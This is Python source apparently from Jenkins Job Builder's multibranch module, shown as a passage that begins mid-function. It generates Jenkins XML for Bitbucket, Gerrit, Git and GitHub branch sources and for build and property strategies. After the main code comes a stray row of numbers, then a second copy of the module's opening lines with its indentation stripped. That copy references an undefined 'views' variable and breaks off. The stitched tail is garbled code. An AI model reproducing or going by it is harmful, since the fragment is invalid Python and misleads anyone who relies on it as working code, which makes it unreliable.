                raise InvalidAttributeError(
                    'periodic-folder-trigger',
                    pft_val,
                    pft_map.keys())
            pft_path = (
                'com.cloudbees.hudson.plugins.folder.computed.'
                'PeriodicFolderTrigger')
            pft = XML.SubElement(triggers, pft_path, {
                'plugin': 'cloudbees-folder'
            })
            XML.SubElement(pft, 'spec').text = pft_map[pft_val][0]
            XML.SubElement(pft, 'interval').text = pft_map[pft_val][1]
        ###########
        # Sources #
        ###########
        sources = XML.SubElement(xml_parent, 'sources', {
            'class': 'jenkins.branch.MultiBranchProject$BranchSourceList',
            'plugin': 'branch-api',
        })
        sources_data = XML.SubElement(sources, 'data')
        XML.SubElement(sources, 'owner', {
            'class': self.jenkins_class,
            'reference': '../..',
        })
        valid_scm = [
            'bitbucket',
            'gerrit',
            'git',
            'github',
        ]
        # NOTE(review): iterating data.get('scm', None) raises TypeError when
        # 'scm' is absent — presumably 'scm' is required by the schema;
        # confirm before relying on a friendlier error here.
        for scm_data in data.get('scm', None):
            for scm in scm_data:
                bs = XML.SubElement(
                    sources_data, 'jenkins.branch.BranchSource')
                if scm == 'bitbucket':
                    bitbucket_scm(bs, scm_data[scm])
                elif scm == 'gerrit':
                    gerrit_scm(bs, scm_data[scm])
                elif scm == 'git':
                    git_scm(bs, scm_data[scm])
                elif scm == 'github':
                    github_scm(bs, scm_data[scm])
                else:
                    raise InvalidAttributeError('scm', scm_data, valid_scm)
        ###########
        # Factory #
        ###########
        factory = XML.SubElement(xml_parent, 'factory', {
            'class': self.jenkins_factory_class,
        })
        XML.SubElement(factory, 'owner', {
            'class': self.jenkins_class,
            'reference': '../..'
        })
        XML.SubElement(factory, 'scriptPath').text = data.get(
            'script-path', 'Jenkinsfile')
        return xml_parent
class WorkflowMultiBranchDefaults(WorkflowMultiBranch):
    """Variant of WorkflowMultiBranch for the Pipeline Multibranch Defaults
    Plugin: identical XML generation, but the project and factory classes
    point at the plugin's 'defaults' implementations.
    """
    jenkins_class = (
        'org.jenkinsci.plugins.pipeline.multibranch'
        '.defaults.PipelineMultiBranchDefaultsProject')
    jenkins_factory_class = (
        'org.jenkinsci.plugins.pipeline.multibranch'
        '.defaults.PipelineBranchDefaultsProjectFactory')
def bitbucket_scm(xml_parent, data):
    r"""Configure BitBucket scm

    Requires the :jenkins-wiki:`Bitbucket Branch Source Plugin
    <Bitbucket+Branch+Source+Plugin>`.

    :arg str credentials-id: The credential to use to scan BitBucket.
        (required)
    :arg str repo-owner: Specify the name of the Bitbucket Team or Bitbucket
        User Account. (required)
    :arg str repo: The BitBucket repo. (required)

    :arg bool discover-tags: Discovers tags on the repository.
        (default false)
    :arg str server-url: The address of the bitbucket server. (optional)
    :arg str head-filter-regex: A regular expression for filtering
        discovered source branches. Requires the :jenkins-wiki:`SCM API Plugin
        <SCM+API+Plugin>`.
    :arg str discovery-branch: Discovers branches on the repository.
        Valid options: ex-pr, only-pr, all.
        Value is not specified by default.
    :arg str discover-pr-origin: Discovers pull requests where the origin
        repository is the same as the target repository.
        Valid options: mergeOnly, headOnly, mergeAndHead.
        Value is not specified by default.
    :arg str discover-pr-forks-strategy: Fork strategy. Valid options:
        merge-current, current, both, false. (default 'merge-current')
    :arg str discover-pr-forks-trust: Discovers pull requests where the origin
        repository is a fork of the target repository.
        Valid options: contributors, everyone, permission or nobody.
        (default 'contributors')
    :arg list build-strategies: Provides control over whether to build a branch
        (or branch like things such as change requests and tags) whenever it is
        discovered initially or a change from the previous revision has been
        detected. (optional)
        Refer to :func:`~build_strategies <build_strategies>`.
    :arg dict property-strategies: Provides control over how to build a branch
        (like to disable SCM triggering or to override the pipeline durability)
        (optional)
        Refer to :func:`~property_strategies <property_strategies>`.
    :arg bool local-branch: Check out to matching local branch
        If given, checkout the revision to build as HEAD on this branch.
        If selected, then the branch name is computed from the remote branch
        without the origin. In that case, a remote branch origin/master will
        be checked out to a local branch named master, and a remote branch
        origin/develop/new-feature will be checked out to a local branch
        named develop/newfeature.
        Requires the :jenkins-wiki:`Git Plugin <Git+Plugin>`.
    :arg dict checkout-over-ssh: Checkout repo over ssh.

        * **credentials** ('str'): Credentials to use for
            checkout of the repo over ssh.

    :arg dict filter-by-name-wildcard: Enable filter by name with wildcards.
        Requires the :jenkins-wiki:`SCM API Plugin <SCM+API+Plugin>`.

        * **includes** ('str'): Space-separated list
            of name patterns to consider. You may use * as a wildcard;
            for example: `master release*`
        * **excludes** ('str'): Name patterns to
            ignore even if matched by the includes list.
            For example: `release*`

    :extensions:

        * **clean** (`dict`)
            * **after** (`bool`) - Clean the workspace after checkout
            * **before** (`bool`) - Clean the workspace before checkout
        * **prune** (`bool`) - Prune remote branches (default false)
        * **shallow-clone** (`bool`) - Perform shallow clone (default false)
        * **depth** (`int`) - Set shallow clone depth (default 1)
        * **do-not-fetch-tags** (`bool`) - Perform a clone without tags
            (default false)
        * **submodule** (`dict`)
            * **disable** (`bool`) - By disabling support for submodules you
              can still keep using basic git plugin functionality and just have
              Jenkins to ignore submodules completely as if they didn't exist.
            * **recursive** (`bool`) - Retrieve all submodules recursively
              (uses '--recursive' option which requires git>=1.6.5)
            * **tracking** (`bool`) - Retrieve the tip of the configured
              branch in .gitmodules (Uses '\-\-remote' option which requires
              git>=1.8.2)
            * **parent-credentials** (`bool`) - Use credentials from default
              remote of parent repository (default false).
            * **reference-repo** (`str`) - Path of the reference repo to use
              during clone (optional)
            * **timeout** (`int`) - Specify a timeout (in minutes) for
              submodules operations (default 10).
        * **timeout** (`str`) - Timeout for git commands in minutes (optional)
        * **use-author** (`bool`): Use author rather than committer in Jenkin's
            build changeset (default false)
        * **wipe-workspace** (`bool`) - Wipe out workspace before build
            (default true)

    Minimal Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_bitbucket_minimal.yaml

    Full Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_bitbucket_full.yaml
    """
    # <source> element describing the Bitbucket branch source itself.
    source = XML.SubElement(xml_parent, 'source', {
        'class': 'com.cloudbees.jenkins.plugins.bitbucket.BitbucketSCMSource',
        'plugin': 'cloudbees-bitbucket-branch-source',
    })
    # The source id is derived deterministically from owner + repo so that
    # regenerating the job keeps the same id.
    source_mapping = [
        ('', 'id', '-'.join(['bb', data.get('repo-owner', ''),
            data.get('repo', '')])),
        ('repo-owner', 'repoOwner', None),
        ('repo', 'repository', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, source_mapping, fail_required=True)
    mapping_optional = [
        ('credentials-id', 'credentialsId', None),
        ('server-url', 'serverUrl', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, mapping_optional, fail_required=False)
    # Each optional behaviour below becomes one 'trait' child element.
    traits = XML.SubElement(source, 'traits')
    if data.get('discover-tags', False):
        XML.SubElement(traits,
            'com.cloudbees.jenkins.plugins.bitbucket.TagDiscoveryTrait')
    if data.get('head-filter-regex', None):
        rshf = XML.SubElement(traits,
            'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
        XML.SubElement(rshf, 'regex').text = data.get('head-filter-regex')
    if data.get('discover-pr-origin', None):
        dpro = XML.SubElement(traits,
            'com.cloudbees.jenkins.plugins.bitbucket'
            '.OriginPullRequestDiscoveryTrait')
        # Numeric strategy ids are the plugin's own encoding of the choices.
        dpro_strategies = {
            'mergeOnly': '1',
            'headOnly': '2',
            'mergeAndHead': '3'
        }
        dpro_mapping = [
            ('discover-pr-origin', 'strategyId', None, dpro_strategies)
        ]
        helpers.convert_mapping_to_xml(
            dpro, data, dpro_mapping, fail_required=True)
    if data.get('discover-pr-forks-strategy'):
        dprf = XML.SubElement(traits,
            'com.cloudbees.jenkins.plugins.bitbucket'
            '.ForkPullRequestDiscoveryTrait')
        dprf_strategy = {
            'merge-current': '1',
            'current': '2',
            'both': '3',
        }
        dprf_mapping = [
            ('discover-pr-forks-strategy', 'strategyId', 'merge-current',
            dprf_strategy)
        ]
        helpers.convert_mapping_to_xml(
            dprf, data, dprf_mapping, fail_required=True)
        # The 'trust' sub-element selects which fork PR authors are trusted
        # to supply a Jenkinsfile; encoded as a Java class name.
        trust = data.get('discover-pr-forks-trust', 'contributors')
        trust_map = {
            'contributors': ''.join([
                'com.cloudbees.jenkins.plugins.bitbucket'
                '.ForkPullRequestDiscoveryTrait$TrustContributors']),
            'everyone': ''.join([
                'com.cloudbees.jenkins.plugins.bitbucket'
                '.ForkPullRequestDiscoveryTrait$TrustEveryone']),
            'permission': ''.join([
                'com.cloudbees.jenkins.plugins.bitbucket'
                '.ForkPullRequestDiscoveryTrait$TrustPermission']),
            'nobody': ''.join([
                'com.cloudbees.jenkins.plugins.bitbucket'
                '.ForkPullRequestDiscoveryTrait$TrustNobody']),
        }
        if trust not in trust_map:
            raise InvalidAttributeError('discover-pr-forks-trust',
                trust,
                trust_map.keys())
        XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]
    if data.get('discover-branch', None):
        dbr = XML.SubElement(traits,
            'com.cloudbees.jenkins.plugins.bitbucket.BranchDiscoveryTrait')
        dbr_strategies = {
            'ex-pr': '1',
            'only-pr': '2',
            'all': '3'
        }
        dbr_mapping = [
            ('discover-branch', 'strategyId', None, dbr_strategies)
        ]
        helpers.convert_mapping_to_xml(
            dbr, data, dbr_mapping, fail_required=True)
    # NOTE: property/build strategies attach to the enclosing BranchSource
    # element (xml_parent), not to the <source>/<traits> created above.
    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)
    if data.get('local-branch', False):
        lbr = XML.SubElement(traits,
            'jenkins.plugins.git.traits.LocalBranchTrait', {
                'plugin': 'git',
            }
        )
        lbr_extension = XML.SubElement(lbr,
            'extension', {
                'class': 'hudson.plugins.git.extensions.impl.LocalBranch',
            }
        )
        # '**' means "match the remote branch name" per the Git plugin.
        XML.SubElement(lbr_extension,
            'localBranch').text = "**"
    if data.get('checkout-over-ssh', None):
        cossh = XML.SubElement(traits,
            'com.cloudbees.jenkins.plugins.bitbucket.SSHCheckoutTrait')
        cossh_credentials = [
            ('credentials', 'credentialsId', ''),
        ]
        helpers.convert_mapping_to_xml(
            cossh,
            data.get('checkout-over-ssh'),
            cossh_credentials,
            fail_required=True)
    if data.get('filter-by-name-wildcard', None):
        wscmf_name = XML.SubElement(traits,
            'jenkins.scm.impl.trait.WildcardSCMHeadFilterTrait', {
                'plugin': 'scm-api',
            }
        )
        wscmf_name_mapping = [
            ('includes', 'includes', ''),
            ('excludes', 'excludes', '')
        ]
        helpers.convert_mapping_to_xml(
            wscmf_name,
            data.get('filter-by-name-wildcard', ''),
            wscmf_name_mapping,
            fail_required=True)

    # handle the default git extensions like:
    # - clean
    # - shallow-clone
    # - timeout
    # - do-not-fetch-tags
    # - submodule
    # - prune
    # - wipe-workspace
    # - use-author
    git_extensions(traits, data)
def gerrit_scm(xml_parent, data):
    """Configure a Gerrit SCM source for a multibranch project.

    Requires the :jenkins-wiki:`Gerrit Code Review Plugin
    <Gerrit+Code+Review+Plugin>`.

    :arg str url: The git url. (required)
    :arg str credentials-id: The credential to use to connect to the GIT
        URL. (default '')
    :arg bool ignore-on-push-notifications: If a job should not trigger
        upon push notifications. (default false)
    :arg list(str) refspecs: Which refspecs to look for; a single string
        is also accepted.
        (default ``['+refs/changes/*:refs/remotes/@{remote}/*',
        '+refs/heads/*:refs/remotes/@{remote}/*']``)
    :arg str includes: Comma-separated list of branches to be included.
        (default '*')
    :arg str excludes: Comma-separated list of branches to be excluded.
        (default '')
    :arg list build-strategies: Controls whether to build a branch (or
        branch-like thing such as a change request or tag) when it is
        first discovered or a new revision is detected. (optional)
        Refer to :func:`~build_strategies <build_strategies>`.
    :arg dict property-strategies: Controls how to build a branch, e.g.
        suppressing SCM triggering or overriding pipeline durability.
        (optional)
        Refer to :func:`~property_strategies <property_strategies>`.

    Minimal Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_gerrit_minimal.yaml

    Full Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_gerrit_full.yaml
    """
    src = XML.SubElement(xml_parent, 'source', {
        'class': 'jenkins.plugins.gerrit.GerritSCMSource',
        'plugin': 'gerrit',
    })
    required = [
        ('', 'id', '-'.join(['gr', data.get('url', '')])),
        ('url', 'remote', None),
        ('credentials-id', 'credentialsId', ''),
        ('includes', 'includes', '*'),
        ('excludes', 'excludes', ''),
        ('ignore-on-push-notifications', 'ignoreOnPushNotifications', True),
    ]
    helpers.convert_mapping_to_xml(src, data, required, fail_required=True)
    optional = [
        ('api-uri', 'apiUri', None),
    ]
    helpers.convert_mapping_to_xml(src, data, optional, fail_required=False)

    # Traits: change discovery plus the refspec templates to fetch.
    traits = XML.SubElement(src, 'traits')
    XML.SubElement(
        traits, 'jenkins.plugins.gerrit.traits.ChangeDiscoveryTrait')

    refspec_trait = XML.SubElement(
        traits, 'jenkins.plugins.git.traits.RefSpecsSCMSourceTrait',
        {'plugin': 'git'})
    templates = XML.SubElement(refspec_trait, 'templates')
    refspecs = data.get('refspecs', [
        '+refs/changes/*:refs/remotes/@{remote}/*',
        '+refs/heads/*:refs/remotes/@{remote}/*',
    ])
    # A lone refspec string is accepted and normalized to a list.
    if isinstance(refspecs, six.string_types):
        refspecs = [refspecs]
    template_tag = ('jenkins.plugins.git.traits'
                    '.RefSpecsSCMSourceTrait_-RefSpecTemplate')
    for spec in refspecs:
        tmpl = XML.SubElement(templates, template_tag)
        XML.SubElement(tmpl, 'value').text = spec

    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)
def git_scm(xml_parent, data):
    """Configure a plain Git SCM source for a multibranch project.

    Requires the :jenkins-wiki:`Git Plugin <Git+Plugin>`.

    :arg str url: The git repo url. (required)
    :arg str credentials-id: The credential to use to connect to the GIT
        repo. (default '')
    :arg bool discover-branches: Discovers branches on the repository.
        (default true)
    :arg bool discover-tags: Discovers tags on the repository.
        (default false)
    :arg bool ignore-on-push-notifications: If a job should not trigger
        upon push notifications. (default false)
    :arg str head-filter-regex: A regular expression for filtering
        discovered source branches. Requires the :jenkins-wiki:`SCM API
        Plugin <SCM+API+Plugin>`.
    :arg list build-strategies: Controls whether to build a branch (or
        branch-like thing such as a change request or tag) when it is
        first discovered or a new revision is detected. (optional)
        Refer to :func:`~build_strategies <build_strategies>`.
    :arg dict property-strategies: Controls how to build a branch, e.g.
        suppressing SCM triggering or overriding pipeline durability.
        (optional)
        Refer to :func:`~property_strategies <property_strategies>`.

    The common git extensions (clean, shallow-clone, timeout,
    do-not-fetch-tags, submodule, prune, wipe-workspace, use-author) are
    handled by :func:`git_extensions`.

    Minimal Example:

    .. literalinclude:: /../../tests/multibranch/fixtures/scm_git_minimal.yaml

    Full Example:

    .. literalinclude:: /../../tests/multibranch/fixtures/scm_git_full.yaml
    """
    src = XML.SubElement(xml_parent, 'source', {
        'class': 'jenkins.plugins.git.GitSCMSource',
        'plugin': 'git',
    })
    helpers.convert_mapping_to_xml(src, data, [
        ('', 'id', '-'.join(['gt', data.get('url', '')])),
        ('url', 'remote', None),
        ('credentials-id', 'credentialsId', ''),
    ], fail_required=True)

    ##########
    # Traits #
    ##########

    traits = XML.SubElement(src, 'traits')
    trait_base = 'jenkins.plugins.git.traits'
    if data.get('discover-branches', True):
        XML.SubElement(traits, trait_base + '.BranchDiscoveryTrait')
    if data.get('discover-tags', False):
        XML.SubElement(traits, trait_base + '.TagDiscoveryTrait')
    if data.get('ignore-on-push-notifications', False):
        XML.SubElement(traits, trait_base + '.IgnoreOnPushNotificationTrait')

    regex = data.get('head-filter-regex', None)
    if regex:
        head_filter = XML.SubElement(
            traits, 'jenkins.scm.impl.trait.RegexSCMHeadFilterTrait')
        XML.SubElement(head_filter, 'regex').text = regex

    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)

    # Default git extensions shared with the other SCM sources.
    git_extensions(traits, data)
def github_scm(xml_parent, data):
    r"""Configure GitHub SCM

    Requires the :jenkins-wiki:`GitHub Branch Source Plugin
    <GitHub+Branch+Source+Plugin>`.

    :arg str api-uri: The GitHub API uri for hosted / on-site GitHub. Must
        first be configured in Global Configuration. (default GitHub)
    :arg bool ssh-checkout: Checkout over SSH.

        * **credentials** ('str'): Credentials to use for
          checkout of the repo over ssh.

    :arg str credentials-id: Credentials used to scan branches and pull
        requests, check out sources and mark commit statuses. (optional)
    :arg str repo-owner: Specify the name of the GitHub Organization or
        GitHub User Account. (required)
    :arg str repo: The GitHub repo. (required)
    :arg str branch-discovery: Discovers branches on the repository.
        Valid options: no-pr, only-pr, all, false. (default 'no-pr')
    :arg str discover-pr-forks-strategy: Fork strategy. Valid options:
        merge-current, current, both, false. (default 'merge-current')
    :arg str discover-pr-forks-trust: Discovers pull requests where the origin
        repository is a fork of the target repository.
        Valid options: contributors, everyone, permission or nobody.
        (default 'contributors')
    :arg str discover-pr-origin: Discovers pull requests where the origin
        repository is the same as the target repository.
        Valid options: merge-current, current, both. (default 'merge-current')
    :arg bool discover-tags: Discovers tags on the repository.
        (default false)
    :arg list build-strategies: Provides control over whether to build a branch
        (or branch like things such as change requests and tags) whenever it is
        discovered initially or a change from the previous revision has been
        detected. (optional)
        Refer to :func:`~build_strategies <build_strategies>`.
    :arg dict property-strategies: Provides control over how to build a branch
        (like to disable SCM triggering or to override the pipeline durability)
        (optional)
        Refer to :func:`~property_strategies <property_strategies>`.
    :arg bool disable-pr-notifications: Disable default github status
        notifications on pull requests. (default false) (Requires the
        :jenkins-plugins:`GitHub Branch Source Plugin
        <disable-github-multibranch-status>`.)

    The common git extensions (clean, shallow-clone, timeout,
    do-not-fetch-tags, submodule, prune, wipe-workspace, use-author) are
    handled by :func:`git_extensions`.

    Minimal Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_github_minimal.yaml

    Full Example:

    .. literalinclude::
       /../../tests/multibranch/fixtures/scm_github_full.yaml
    """
    github_path = 'org.jenkinsci.plugins.github_branch_source'
    github_path_dscore = 'org.jenkinsci.plugins.github__branch__source'

    source = XML.SubElement(xml_parent, 'source', {
        'class': ''.join([github_path, '.GitHubSCMSource']),
        'plugin': 'github-branch-source',
    })
    mapping = [
        ('', 'id', '-'.join(['gh', data.get('repo-owner', ''),
                             data.get('repo', '')])),
        ('repo-owner', 'repoOwner', None),
        ('repo', 'repository', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, mapping, fail_required=True)

    mapping_optional = [
        ('api-uri', 'apiUri', None),
        ('credentials-id', 'credentialsId', None),
    ]
    helpers.convert_mapping_to_xml(
        source, data, mapping_optional, fail_required=False)

    traits = XML.SubElement(source, 'traits')

    # no-pr value is assumed if branch-discovery not mentioned.
    if data.get('branch-discovery', 'no-pr'):
        bd = XML.SubElement(traits, ''.join([
            github_path_dscore, '.BranchDiscoveryTrait']))
        bd_strategy = {
            'no-pr': '1',
            'only-pr': '2',
            'all': '3',
        }
        bd_mapping = [
            ('branch-discovery', 'strategyId', 'no-pr', bd_strategy)
        ]
        helpers.convert_mapping_to_xml(
            bd, data, bd_mapping, fail_required=True)

    if data.get('ssh-checkout', None):
        cossh = XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.SSHCheckoutTrait'
            ])
        )
        # ssh-checkout may be a bare boolean (anonymous key) or a dict
        # carrying explicit credentials.
        if not isinstance(data.get('ssh-checkout'), bool):
            cossh_credentials = [
                ('credentials', 'credentialsId', ''),
            ]
            helpers.convert_mapping_to_xml(
                cossh,
                data.get('ssh-checkout'),
                cossh_credentials,
                fail_required=True)

    if data.get('discover-tags', False):
        XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.TagDiscoveryTrait'
            ])
        )

    # FIX: the fallback used to be the misspelled 'merged-current'.
    # Behavior is unchanged (any truthy string enables the trait and the
    # real default comes from the mapping below), but the value now
    # matches the documented option name.
    if data.get('discover-pr-forks-strategy', 'merge-current'):
        dprf = XML.SubElement(
            traits, ''.join([
                github_path_dscore, '.ForkPullRequestDiscoveryTrait'
            ])
        )
        dprf_strategy = {
            'merge-current': '1',
            'current': '2',
            'both': '3',
        }
        dprf_mapping = [
            ('discover-pr-forks-strategy', 'strategyId', 'merge-current',
            dprf_strategy)
        ]
        helpers.convert_mapping_to_xml(
            dprf, data, dprf_mapping, fail_required=True)

        trust = data.get('discover-pr-forks-trust', 'contributors')
        trust_map = {
            'contributors': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustContributors']),
            'everyone': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustEveryone']),
            'permission': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustPermission']),
            'nobody': ''.join([
                github_path,
                '.ForkPullRequestDiscoveryTrait$TrustNobody']),
        }
        if trust not in trust_map:
            raise InvalidAttributeError('discover-pr-forks-trust',
                                        trust,
                                        trust_map.keys())
        XML.SubElement(dprf, 'trust').attrib['class'] = trust_map[trust]

    # Origin pull requests are always discovered; only the strategy varies.
    dpro_strategy = data.get('discover-pr-origin', 'merge-current')
    dpro = XML.SubElement(traits, ''.join([
        github_path_dscore,
        '.OriginPullRequestDiscoveryTrait'
    ]))
    dpro_strategy_map = {
        'merge-current': '1',
        'current': '2',
        'both': '3',
    }
    if dpro_strategy not in dpro_strategy_map:
        raise InvalidAttributeError('discover-pr-origin',
                                    dpro_strategy,
                                    dpro_strategy_map.keys())
    dpro_mapping = [
        ('discover-pr-origin', 'strategyId', 'merge-current',
        dpro_strategy_map)
    ]
    helpers.convert_mapping_to_xml(
        dpro, data, dpro_mapping, fail_required=True)

    if data.get('property-strategies', None):
        property_strategies(xml_parent, data)
    if data.get('build-strategies', None):
        build_strategies(xml_parent, data)

    # handle the default git extensions like:
    # - clean
    # - shallow-clone
    # - timeout
    # - do-not-fetch-tags
    # - submodule
    # - prune
    # - wipe-workspace
    # - use-author
    git_extensions(traits, data)

    # github-only extensions
    disable_github_status_path_dscore = (
        'com.adobe.jenkins.disable__github__multibranch__status')
    if data.get('disable-pr-notifications', False):
        XML.SubElement(
            traits, ''.join([
                disable_github_status_path_dscore, '.DisableStatusUpdateTrait'
            ]), {
                'plugin': 'disable-github-multibranch-status'
            }
        )
def build_strategies(xml_parent, data):
    """Configure Basic Branch Build Strategies.

    Requires the :jenkins-wiki:`Basic Branch Build Strategies Plugin
    <Basic+Branch+Build+Strategies+Plugin>`.

    :arg list build-strategies: Definition of build strategies.

        * **tags** (dict): Builds tags

            * **ignore-tags-newer-than** (int) The number of days since the
              tag was created before it is eligible for automatic building.
              (optional, default -1)
            * **ignore-tags-older-than** (int) The number of days since the
              tag was created after which it is no longer eligible for
              automatic building. (optional, default -1)

        * **change-request** (dict): Builds change requests / pull requests

            * **ignore-target-only-changes** (bool) Ignore rebuilding merge
              branches when only the target branch changed.
              (optional, default false)

        * **regular-branches** (bool): Builds regular branches whenever a
          change is detected. (optional, default None)
        * **named-branches** (list): Builds named branches whenever a change
          is detected.

            * **exact-name** (dict) Matches the name verbatim.

                * **name** (str) The name to match. (optional)
                * **case-sensitive** (bool) Check this box if the name should
                  be matched case sensitively. (default false)

            * **regex-name** (dict) Matches the name against a regular
              expression.

                * **regex** (str) A Java regular expression to restrict the
                  names. Names that do not match the supplied regular
                  expression will be ignored. (default `^.*$`)
                * **case-sensitive** (bool) Check this box if the name should
                  be matched case sensitively. (default false)

            * **wildcards-name** (dict) Matches the name against an
              include/exclude set of wildcards.

                * **includes** (str) Space-separated list of name patterns to
                  consider. You may use `*` as a wildcard;
                  for example: `master release*` (default `*`)
                * **excludes** (str) Name patterns to ignore even if matched
                  by the includes list. For example: release (optional)
    """
    basic_build_strategies = 'jenkins.branch.buildstrategies.basic'
    bbs = XML.SubElement(xml_parent, 'buildStrategies')
    # FIX: iterate an empty list (instead of None -> TypeError) when the
    # 'build-strategies' key is absent or empty.
    for bbs_list in data.get('build-strategies') or []:
        if 'tags' in bbs_list:
            tags = bbs_list['tags']
            tags_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
                '.TagBuildStrategyImpl']), {
                    'plugin': 'basic-branch-build-strategies',
            })
            # Day counts are converted to milliseconds; -1 disables a bound.
            newer_than = -1
            if ('ignore-tags-newer-than' in tags and
                    tags['ignore-tags-newer-than'] >= 0):
                newer_than = tags['ignore-tags-newer-than'] * 86400000
            XML.SubElement(tags_elem, 'atMostMillis').text = str(newer_than)

            older_than = -1
            if ('ignore-tags-older-than' in tags and
                    tags['ignore-tags-older-than'] >= 0):
                older_than = tags['ignore-tags-older-than'] * 86400000
            XML.SubElement(tags_elem, 'atLeastMillis').text = str(older_than)

        if bbs_list.get('regular-branches', False):
            XML.SubElement(bbs, ''.join([basic_build_strategies,
                '.BranchBuildStrategyImpl']), {
                    'plugin': 'basic-branch-build-strategies',
            })

        if 'change-request' in bbs_list:
            cr = bbs_list['change-request']
            cr_elem = XML.SubElement(bbs, ''.join([basic_build_strategies,
                '.ChangeRequestBuildStrategyImpl']), {
                    'plugin': 'basic-branch-build-strategies',
            })
            itoc = cr.get('ignore-target-only-changes', False)
            XML.SubElement(cr_elem, 'ignoreTargetOnlyChanges').text = (
                str(itoc).lower())

        if 'named-branches' in bbs_list:
            named_branch_elem = XML.SubElement(bbs, ''.join(
                [basic_build_strategies, '.NamedBranchBuildStrategyImpl']), {
                    'plugin': 'basic-branch-build-strategies',
            })

            filters = XML.SubElement(named_branch_elem, 'filters')

            for nb in bbs_list['named-branches']:
                if 'exact-name' in nb:
                    exact_name_elem = XML.SubElement(filters, ''.join(
                        [basic_build_strategies,
                            '.NamedBranchBuildStrategyImpl',
                            '_-ExactNameFilter']))
                    exact_name_mapping = [
                        ('name', 'name', ''),
                        ('case-sensitive', 'caseSensitive', False)
                    ]
                    helpers.convert_mapping_to_xml(
                        exact_name_elem,
                        nb['exact-name'],
                        exact_name_mapping,
                        fail_required=False)
                if 'regex-name' in nb:
                    regex_name_elem = XML.SubElement(filters, ''.join([
                        basic_build_strategies,
                        '.NamedBranchBuildStrategyImpl',
                        '_-RegexNameFilter']))
                    regex_name_mapping = [
                        ('regex', 'regex', '^.*$'),
                        ('case-sensitive', 'caseSensitive', False)
                    ]
                    helpers.convert_mapping_to_xml(
                        regex_name_elem, nb['regex-name'],
                        regex_name_mapping, fail_required=False)
                if 'wildcards-name' in nb:
                    wildcards_name_elem = XML.SubElement(filters, ''.join([
                        basic_build_strategies,
                        '.NamedBranchBuildStrategyImpl',
                        '_-WildcardsNameFilter']))
                    wildcards_name_mapping = [
                        ('includes', 'includes', '*'),
                        ('excludes', 'excludes', '')
                    ]
                    helpers.convert_mapping_to_xml(
                        wildcards_name_elem,
                        nb['wildcards-name'],
                        wildcards_name_mapping,
                        fail_required=False)
def property_strategies(xml_parent, data):
    """Configure Basic Branch Property Strategies.

    Requires the :jenkins-wiki:`Branch API Plugin <Branch+API+Plugin>`.

    :arg dict property-strategies: Definition of property strategies.

        * **all-branches** (list): A list of property strategy definitions
          for use with all branches.

            * **suppress-scm-triggering** (bool): Suppresses automatic SCM
              triggering (optional)
            * **pipeline-branch-durability-override** (str): Set a custom
              branch speed/durability level. Valid values:
              performance-optimized, survivable-nonatomic, or
              max-survivability (optional) Requires the :jenkins-wiki:
              `Pipeline Multibranch Plugin <Pipeline+Multibranch+Plugin>`
    """
    # Valid options for the pipeline branch durability override.
    pbdo_map = collections.OrderedDict([
        ("max-survivability", "MAX_SURVIVABILITY"),
        ("performance-optimized", "PERFORMANCE_OPTIMIZED"),
        ("survivable-nonatomic", "SURVIVABLE_NONATOMIC"),
    ])

    basic_property_strategies = 'jenkins.branch'
    workflow_multibranch = 'org.jenkinsci.plugins.workflow.multibranch'
    # The <strategy> element is emitted even when no strategies are
    # configured; only its <properties> children are conditional.
    dbps = XML.SubElement(xml_parent, 'strategy', {
        'class': ''.join([basic_property_strategies,
            '.DefaultBranchPropertyStrategy'])})

    prop_strats = data.get('property-strategies', None)

    if prop_strats:
        props_elem = XML.SubElement(dbps, 'properties', {
            'class': 'java.util.Arrays$ArrayList'})
        props_elem = XML.SubElement(props_elem, 'a', {
            'class': ''.join([
                basic_property_strategies, '.BranchProperty-array'])})

        # FIX: iterate an empty list (instead of None -> TypeError) when
        # 'all-branches' is absent.
        for dbs_list in prop_strats.get('all-branches') or []:
            if dbs_list.get('suppress-scm-triggering', False):
                XML.SubElement(props_elem, ''.join([
                    basic_property_strategies, '.NoTriggerBranchProperty']))

            pbdo_val = dbs_list.get(
                'pipeline-branch-durability-override', None)
            if pbdo_val:
                if not pbdo_map.get(pbdo_val):
                    raise InvalidAttributeError(
                        'pipeline-branch-durability-override',
                        pbdo_val,
                        pbdo_map.keys())
                pbdo_elem = XML.SubElement(props_elem, ''.join([
                    workflow_multibranch,
                    '.DurabilityHintBranchProperty']), {
                        'plugin': 'workflow-multibranch'})
                XML.SubElement(pbdo_elem, 'hint').text = pbdo_map.get(
                    pbdo_val)
| 39.701505 | 79 | 0.582609 |
import collections
import logging
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
import jenkins_jobs.modules.helpers as helpers
import six
from jenkins_jobs.modules.scm import git_extensions
from jenkins_jobs.errors import InvalidAttributeError
logger = logging.getLogger(str(__name__))
class WorkflowMultiBranch(jenkins_jobs.modules.base.Base):
sequence = 0
multibranch_path = 'org.jenkinsci.plugins.workflow.multibranch'
jenkins_class = ''.join([multibranch_path, '.WorkflowMultiBranchProject'])
jenkins_factory_class = ''.join(
[multibranch_path, '.WorkflowBranchProjectFactory'])
def root_xml(self, data):
xml_parent = XML.Element(self.jenkins_class)
xml_parent.attrib['plugin'] = 'workflow-multibranch'
XML.SubElement(xml_parent, 'properties')
all_view = XML.SubElement(views, 'hudson.model.AllView')
